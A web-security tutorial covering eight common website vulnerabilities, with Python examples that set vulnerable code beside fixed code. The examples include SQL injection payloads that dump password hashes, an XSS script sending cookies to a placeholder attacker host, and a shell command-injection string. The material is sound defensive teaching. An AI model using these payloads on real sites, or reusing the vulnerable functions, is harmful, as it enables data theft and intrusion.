Website Vulnerabilities Hackers Can Exploit

Any flaw in a website that an attacker can exploit is called a website vulnerability. Many security controls exist to protect a website from cyber threats, yet attackers still regularly manage to find a way in. An attacker who compromises a website may gain access to the admin panel and can then display anything they like on the site, which damages your reputation in the market. Important information about your business, clients and customers is now in the hands of a malicious person, who can use it for their own gain; the worst they can do is delete your website files and database. Therefore, while developing and deploying a website, always consider the possible security threats and implement the essential preventive measures. Here are 8 common website vulnerabilities that lend a helping hand to attackers:

SQL Injection:

SQL injection is a kind of code injection attack. In a code injection attack the attacker supplies input that the vulnerable program ends up treating as code; when the program runs, that code runs with the program's privileges. Because a website's database holds sensitive information about customers, clients and other users of the application, an attacker who wants to walk off with that confidential data tries to reach the database through SQL injection. The attacker first finds an input that ends up inside an SQL query, then submits a malicious payload that is spliced into the query text and executed by the database server. Depending on the privileges of the database account, the attacker can then read, insert, update and delete the records held in the database. Websites that build queries by concatenating unvalidated user input into SQL text are always prone to SQL injection. The primary defence is to use parameterised queries (prepared statements) for every statement, so that user input is bound as a value and never parsed as SQL; validating input against an allow-list and running the application with a least-privilege database account are worthwhile as defence in depth, but they do not replace parameterisation.
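The following is an added example, not code from the original article. It uses an in-memory SQLite database with a constructed two-row users table (both the schema and the rows are assumed for illustration) to show the same lookup written the vulnerable way, by concatenating the username into the query text, and the safe way, with a bound parameter. Two classic payloads are run against both: one that turns the WHERE clause into a tautology and one that appends a UNION to pull the password hashes out of the same table.

```python
import sqlite3


def make_db():
    """Constructed sample database: two users, one of them an administrator."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("alice", "hash-of-alice-pw", "user"), ("admin", "hash-of-admin-pw", "admin")],
    )
    return conn


def find_user_vulnerable(conn, username):
    # Vulnerable: the untrusted value is pasted into the SQL text, so a quote in
    # it closes the string literal and the rest of the value becomes SQL.
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    # Safe: the query shape is fixed at parse time; the value travels as a bound
    # parameter and is compared as data whatever characters it contains.
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Tautology: WHERE username = '' OR '1'='1' matches every row (login bypass).
TAUTOLOGY = "' OR '1'='1"
# UNION: the trailing -- comments out the closing quote the code appends, and the
# second SELECT returns the password hashes through the "username" column.
UNION_DUMP = "x' UNION SELECT password_hash, role FROM users --"

if __name__ == "__main__":
    db = make_db()
    for payload in (TAUTOLOGY, UNION_DUMP):
        print("vulnerable:", find_user_vulnerable(db, payload))
        print("safe:      ", find_user_safe(db, payload))
```

With the parameterised version both payloads simply fail to match any username; nothing about the query changes because the input is never parsed as SQL.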

Broken authentication and session management:

This vulnerability arises when the functionality that handles authentication and session management is implemented incorrectly. By exploiting it, an attacker can steal session IDs or passwords. The attacker may be an external party or an authorised user; either way, they use the stolen credentials or session ID to pose as another user and reach things they are not entitled to. The flaw usually exists because developers built custom authentication and session management schemes incorrectly, so such schemes must be designed and implemented with great care, or replaced by a well-reviewed framework component. Preventive measures include requiring strong passwords, limiting the number of login attempts, storing passwords as salted hashes computed with a slow, purpose-built algorithm (bcrypt, scrypt or Argon2) rather than in encrypted or plain form, generating session IDs from a cryptographically secure random source, issuing a new session ID when the user logs in, expiring idle and long-lived sessions, and protecting session IDs in transit and in the browser (HTTPS, with the HttpOnly and Secure cookie flags).
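The following is an added example, not code from the original article, showing the session-management half of this advice. It is a small server-side session store: the browser only ever holds an unpredictable random token, the user id and timestamps stay on the server, idle and absolute lifetimes are enforced, and login discards whatever token the client arrived with (the session-fixation defence) before issuing a fresh one. The lifetime values and the cookie name are assumed policy choices; the clock is injectable only so that expiry can be exercised without waiting.

```python
import secrets
import time

# Assumed policy values for this illustration.
SESSION_LIFETIME = 8 * 3600   # absolute limit in seconds, measured from creation
IDLE_TIMEOUT = 15 * 60        # idle limit in seconds, measured from the last request


class SessionStore:
    """Server-side session store keyed by an unpredictable token.

    The browser only ever holds the random token; the user id, creation time
    and last-activity time live on the server, so a client cannot forge,
    extend or upgrade a session by editing what it sends.
    """

    def __init__(self, clock=time.time):
        self._sessions = {}
        self._clock = clock   # injectable so expiry can be tested without sleeping

    def create(self, user_id):
        # 32 bytes from the OS CSPRNG: not guessable and not derived from user data.
        token = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[token] = {"user": user_id, "created": now, "seen": now}
        return token

    def resolve(self, token):
        """Return the user id for a live session; None (and drop it) if unknown or expired."""
        session = self._sessions.get(token)
        if session is None:
            return None
        now = self._clock()
        if now - session["created"] > SESSION_LIFETIME or now - session["seen"] > IDLE_TIMEOUT:
            self.destroy(token)
            return None
        session["seen"] = now
        return session["user"]

    def destroy(self, token):
        self._sessions.pop(token, None)


def login(store, presented_token, user_id):
    """Called only after the password check has succeeded.

    Session fixation defence: the token the client arrived with (possibly
    planted by an attacker before the victim logged in) is discarded, and a
    brand-new token is bound to the authenticated user.
    """
    if presented_token:
        store.destroy(presented_token)
    return store.create(user_id)


def session_cookie(token):
    # HttpOnly keeps the token away from injected scripts, Secure restricts it to
    # HTTPS, SameSite stops most cross-site requests from carrying it.
    return f"session={token}; Path=/; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    store = SessionStore()
    token = login(store, "token-the-attacker-chose", "alice")
    print(session_cookie(token))
    print(store.resolve("token-the-attacker-chose"), store.resolve(token))
```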

Cross Site Scripting (XSS):

Like SQL injection, XSS is a code injection attack, but here the injected code (usually JavaScript) is placed in a web page and runs in the browser of whoever views that page. Websites that copy user input into their output without validation and output encoding are always prone to XSS. The web server is only the carrier; the real target is the victim's browser. When the victim visits the affected page, the malicious JavaScript is delivered along with it and executes in the site's origin with the victim's privileges. The script can then read objects such as cookies: if the session token is kept in a cookie without the HttpOnly flag, the attacker can steal it and hijack the session. The script can also read page content and anything the user types into forms, send requests to the site as the user, steal other data the browser holds for that site, and alter or deface the page. It does not directly reveal the user's password unless the user types it while the script is running. To prevent XSS, encode every piece of output derived from input for the context in which it appears (HTML body, attribute, JavaScript, URL), filter input parameters against an allow-list where possible, and set the HttpOnly flag on session cookies; a Content Security Policy limits the damage when an encoding gap is missed.
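The following is an added example, not code from the original article. It renders a constructed user comment into HTML the vulnerable way (string concatenation) and the safe way (context-appropriate output encoding with the standard library's html.escape), and shows a second context, a link's href attribute, where encoding alone is not enough because a javascript: URL is harmless as text but runs when clicked. The comment payload and the attacker.example hostname are constructed for illustration.

```python
import html

# Constructed attacker comment: it exfiltrates the visitor's cookies to a host
# the attacker controls (attacker.example is a placeholder, not a real site).
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_comment_vulnerable(author, text):
    # Vulnerable: user data is concatenated straight into the HTML, so a comment
    # containing markup is parsed as markup by every visitor's browser.
    return '<p class="comment"><b>' + author + "</b>: " + text + "</p>"


def render_comment_safe(author, text):
    # html.escape turns <, >, &, " and ' into entities, so the browser displays
    # the characters instead of interpreting them. This is HTML body/attribute
    # encoding; JavaScript-string or URL contexts need their own encoders.
    return '<p class="comment"><b>{}</b>: {}</p>'.format(html.escape(author), html.escape(text))


def render_link_safe(url):
    # Attribute context: escape AND restrict the scheme. "javascript:alert(1)"
    # survives escaping unchanged and would execute on click if placed in href.
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return '<a href="{}">link</a>'.format(html.escape(url, quote=True))


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
    print(render_link_safe("javascript:alert(document.cookie)"))
```

Even with correct encoding, marking the session cookie HttpOnly means a script that does slip through cannot read document.cookie, which removes the most direct payoff of the attack.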

Insecure direct object reference:

A website becomes vulnerable to insecure direct object reference when developers expose a reference to an internal object, such as a file name, directory, database record or database key, directly in a URL or form parameter. The attacker exploiting this flaw is typically an authorised user with limited privileges, who reaches an object they are not permitted to see simply by changing the parameter value that refers to it (for example, incrementing an invoice number in the URL). Most of the time this works because the web application fetches the object without checking that the current user is allowed to access it. It is therefore important to enforce access policies on every object access, checking authorisation against the identity and role held in the server-side session rather than anything the client sends, and, where practical, to hand out indirect per-user references instead of raw database keys. Proper testing and code analysis help to identify these flaws in a web application.
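The following is an added example, not code from the original article. It models an invoice lookup over a constructed two-invoice table: the vulnerable version returns whatever id the URL names, the safe version makes the decision from the caller's session identity and role and returns one identical error for "does not exist" and "not yours", and a small indirect-reference map shows the alternative of never exposing database keys at all. The record layout and the user dict shape are assumed for illustration.

```python
# Constructed sample data: invoice id -> owner and amount (not from the page).
INVOICES = {
    1001: {"owner": "alice", "amount": 120.00},
    1002: {"owner": "bob", "amount": 75.50},
}


class AccessDenied(Exception):
    pass


def get_invoice_vulnerable(user, invoice_id):
    # Vulnerable: the id comes straight from the URL (?id=1002) and is trusted.
    # Any logged-in user can read any invoice by editing the number.
    return INVOICES[invoice_id]


def get_invoice_safe(user, invoice_id):
    # Object-level authorisation: the decision uses the identity and role held in
    # the server-side session (the `user` dict), never anything the client sent.
    record = INVOICES.get(invoice_id)
    allowed = record is not None and (
        user["role"] == "admin" or record["owner"] == user["name"]
    )
    if not allowed:
        # One response for "no such invoice" and "not yours", so the id space
        # cannot be enumerated through differing error messages.
        raise AccessDenied("invoice not found")
    return record


def invoice_ids_for(user):
    # Indirect references: the client only ever sees per-user positions
    # (1, 2, ...); the server maps them back to real keys it already scoped to the user.
    owned = sorted(i for i, r in INVOICES.items() if r["owner"] == user["name"])
    return {position: real_id for position, real_id in enumerate(owned, start=1)}


if __name__ == "__main__":
    bob = {"name": "bob", "role": "user"}
    print(get_invoice_vulnerable(bob, 1001))   # alice's invoice leaks
    try:
        get_invoice_safe(bob, 1001)
    except AccessDenied as e:
        print("safe:", e)
    print(invoice_ids_for(bob))
```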

Wrong Security Configuration:

A component of a web application can be exposed to attack by an insecure configuration. If you keep the default settings, such as the default username and password, an attacker can easily obtain administrator privileges. Unnecessarily enabled services, scripts, configuration files, sample files and the like cause misconfiguration at the web server, platform, database, application server and other levels of the application stack. Both developers and administrators have parts to play in securing the configuration of a web application. Automated scanners can detect many of the holes that insecure configuration leaves. Developers should protect sensitive data with established, well-tested cryptographic libraries rather than an encryption scheme of their own, and stack traces and other detailed error output must be hidden from users, which means disabling debug mode in production. Administrators should change default usernames, passwords and other default settings, remove sample applications and documentation, turn off version banners and directory listings, and disable every service that is not needed.
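The following is an added example, not code from the original article. It is a start-up check that audits a deployment configuration for the problems listed above (debug mode, default credentials, directory listing, sample endpoints, version banners) and refuses to start the server while any remain, with a constructed out-of-the-box configuration beside its hardened form. The configuration keys, the list of default credentials and the sample-endpoint names are assumptions for this illustration; real frameworks spell their settings differently.

```python
# Well-known default credentials that should never survive into production (assumed list).
DEFAULT_CREDENTIALS = {("admin", "admin"), ("admin", "password"), ("root", "root"), ("test", "test")}

# Endpoints typically shipped as samples or diagnostics; assumed names for this illustration.
SAMPLE_PATH_PREFIXES = ("/examples", "/sample", "/phpinfo", "/server-status")


def audit_config(cfg):
    """Return a list of findings for a deployment config dict (empty means no issues).

    The keys are assumed for this illustration; each framework names them differently.
    """
    findings = []
    if cfg.get("DEBUG", False):
        findings.append("DEBUG is enabled: stack traces and internals are shown to users")
    if (cfg.get("ADMIN_USER"), cfg.get("ADMIN_PASSWORD")) in DEFAULT_CREDENTIALS:
        findings.append("admin account still uses a well-known default credential")
    if cfg.get("DIRECTORY_LISTING", False):
        findings.append("directory listing is enabled: config and backup files become browsable")
    for path in cfg.get("ENABLED_PATHS", ()):
        if path.startswith(SAMPLE_PATH_PREFIXES):
            findings.append(f"sample or diagnostic endpoint exposed: {path}")
    if cfg.get("SERVER_BANNER", True):
        findings.append("server version banner is on: it tells attackers which exploits to try")
    return findings


def check_before_start(cfg):
    """Fail closed: refuse to start a server whose configuration is insecure."""
    findings = audit_config(cfg)
    if findings:
        raise RuntimeError("insecure configuration:\n  - " + "\n  - ".join(findings))
    return True


# Constructed configs: a typical out-of-the-box deployment and its hardened form.
INSECURE_CONFIG = {
    "DEBUG": True,
    "ADMIN_USER": "admin",
    "ADMIN_PASSWORD": "admin",
    "DIRECTORY_LISTING": True,
    "ENABLED_PATHS": ["/api", "/examples/servlets"],
    "SERVER_BANNER": True,
}
HARDENED_CONFIG = {
    "DEBUG": False,
    "ADMIN_USER": "ops-admin",
    "ADMIN_PASSWORD": "(long unique passphrase loaded from the secret store)",
    "DIRECTORY_LISTING": False,
    "ENABLED_PATHS": ["/api"],
    "SERVER_BANNER": False,
}

if __name__ == "__main__":
    for finding in audit_config(INSECURE_CONFIG):
        print("FAIL:", finding)
    print("hardened config ok:", check_before_start(HARDENED_CONFIG))
```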

Cross Site Request Forgery (CSRF):

In this kind of attack, the attacker tricks an authorised user of a website into performing an unwanted action, such as changing a password or transferring funds, without the victim realising it. The victim's browser unknowingly sends a request crafted by the attacker to a website the victim trusts, and because the browser attaches the victim's cookies to every request for that site, the site treats the request as the victim's own. Consider the following example:
  1. An authorised user logs into a website (say MyBank.com) that offers online banking services.
  2. The attacker tricks the user into visiting a malicious website while still logged in.
  3. The malicious website makes the victim's browser send a request to MyBank.com. As the user is already logged into MyBank.com, the browser includes the session cookie and the attacker's request is carried out as if the victim had made it.

Including an anti-CSRF token in the user's session is the best preventive measure. When a session is created, the server generates a random token, embeds it in every form or state-changing request belonging to that session, and checks it on each such request to confirm that the request came from its own pages; a page on another origin cannot read the token, so a forged request will not carry it. The token must be long and produced by a cryptographically secure random generator so that it cannot be guessed. Setting the SameSite attribute on the session cookie adds a second layer of protection in modern browsers. For additional safety a user should:

  1. avoid browsing other websites in the same browser while logged into a banking or similar site.
  2. always log out once the job is done.
  3. never save login credentials in the browser.

Remote Code Execution:

In a remote code execution attack, the attacker exploits a server-side vulnerability to run code of their choosing on the server, typically with the privileges of the web application or operating-system account it runs under. With that foothold the attacker can read or alter any information the server holds and move further into the network. Most of the time these vulnerabilities come from coding errors, the classic case being untrusted input passed into a shell command or an interpreter, or from unpatched flaws in the server software and frameworks the site depends on. All such security holes must be fixed promptly, and the application should run with the least privilege it needs so that a successful exploit gains as little as possible.
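The following is an added example, not code from the original article, showing the most common coding error behind this class: a hostname from the request passed to a shell. The vulnerable version hands the string to /bin/sh, so a value containing ";" runs a second command; the safe version validates the value against an allow-list (no leading hyphen, so it cannot be read as an option) and passes an argv list with no shell. echo stands in for ping or nslookup so the example runs anywhere; the injection mechanism is identical.

```python
import re
import subprocess

# Allow-list for a hostname: letters, digits, dots and hyphens, no leading hyphen
# (a leading hyphen would let the value be parsed as a command-line option).
HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9.-]{1,253}$")


def lookup_vulnerable(host):
    # Vulnerable: shell=True hands the whole string to /bin/sh, so shell
    # metacharacters in the untrusted value start new commands. `echo` stands in
    # for ping/nslookup so this runs offline; the injection works the same way.
    completed = subprocess.run("echo " + host, shell=True, capture_output=True, text=True)
    return completed.stdout


def lookup_safe(host):
    # Safe: validate against the allow-list, then pass an argv list with no shell,
    # so the value reaches the program as one argument whatever it contains.
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname")
    completed = subprocess.run(["echo", host], capture_output=True, text=True)
    return completed.stdout


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"     # constructed attacker input
    print(lookup_vulnerable(payload), end="")  # prints example.com, then INJECTED
    try:
        lookup_safe(payload)
    except ValueError as e:
        print("safe:", e)
```

Note that dropping shell=True alone already stops the second command from running, but without the allow-list the value would still reach the program as an argument, which for tools that accept options from any position is enough to change their behaviour; doing both is the habit to build.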

Username Enumeration:

This vulnerability exists in applications whose error messages reveal whether a supplied username is valid. It lets an attacker build a list of valid usernames by attempting logins with different names, which removes half the guesswork from a later password-guessing attack. Developers also routinely create trivial accounts for testing, such as admin/admin or test/test, and often forget to delete them, leaving them for attackers to use. Besides the login page, the registration, change-password and forgotten-password pages can leak the same information. First, these guessable username/password combinations must be deleted. Then, on the login page, the application should display a single message such as "Invalid username or password" instead of separate "username does not exist" and "wrong password" messages, so the attacker cannot tell whether the entered username is valid. The response time must not give the answer away either: the server should perform the same password-hash computation whether or not the user exists. Similarly, the registration, forgotten-password and change-password pages should respond identically whether or not a username or email address exists (for example, "If an account exists for that address, a reset link has been sent").
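The following is an added example, not code from the original article. It is a login routine that stores passwords as salted PBKDF2 hashes (the standard library's hashlib.pbkdf2_hmac; bcrypt or Argon2 would be the choice in a real deployment), returns one generic message for both a wrong password and an unknown user, and hashes against a dummy record when the user does not exist so that the response time is the same in both cases. The user table, the iteration count and the reset-page wording are assumptions for this illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000          # assumed work factor for this illustration
GENERIC_ERROR = "Invalid username or password."

# Constructed in-memory user table: username -> (salt, pbkdf2 digest)
USERS = {}


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def register(username, password):
    USERS[username] = hash_password(password)


# A dummy credential hashed once at start-up so that an unknown username still
# costs one full PBKDF2 computation; otherwise a fast "no such user" path would
# reveal through timing which usernames exist.
_DUMMY_SALT, _DUMMY_DIGEST = hash_password("dummy-password-never-accepted")


def login(username, password):
    """Return (ok, message). The message is identical for unknown user and wrong password."""
    record = USERS.get(username)
    salt, stored = record if record is not None else (_DUMMY_SALT, _DUMMY_DIGEST)
    _, computed = hash_password(password, salt)
    # Constant-time comparison of the digests.
    matches = hmac.compare_digest(computed, stored)
    if record is None or not matches:
        return False, GENERIC_ERROR
    return True, "Welcome, " + username


def password_reset_request(email, known_emails):
    """Same answer whether or not the address is registered; the e-mail is only sent if it is."""
    if email in known_emails:
        pass   # enqueue the reset e-mail here; nothing about it is reflected in the response
    return "If an account exists for that address, a reset link has been sent."


if __name__ == "__main__":
    register("alice", "correct horse battery staple")
    print(login("alice", "correct horse battery staple"))
    print(login("alice", "wrong"))
    print(login("nobody", "wrong"))
    print(password_reset_request("nobody@example.com", {"alice@example.com"}))
```

The rate limiting the previous section recommends belongs in front of this routine as well: a uniform message stops enumeration from the response, but it does not stop an attacker who is free to try a million passwords against one account.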

Conclusion

Those with wrong intentions are always looking for a chink in a website's armour, so a website should be developed and deployed with all of these classes of vulnerability in mind. Furthermore, regular updates, tightened access control, network security, a firewall and security monitoring, TLS (HTTPS) for all traffic and several other measures help to protect a website. Regular backups, stored away from the web server and tested for restore, are essential: if your website is hacked, you will not lose your data.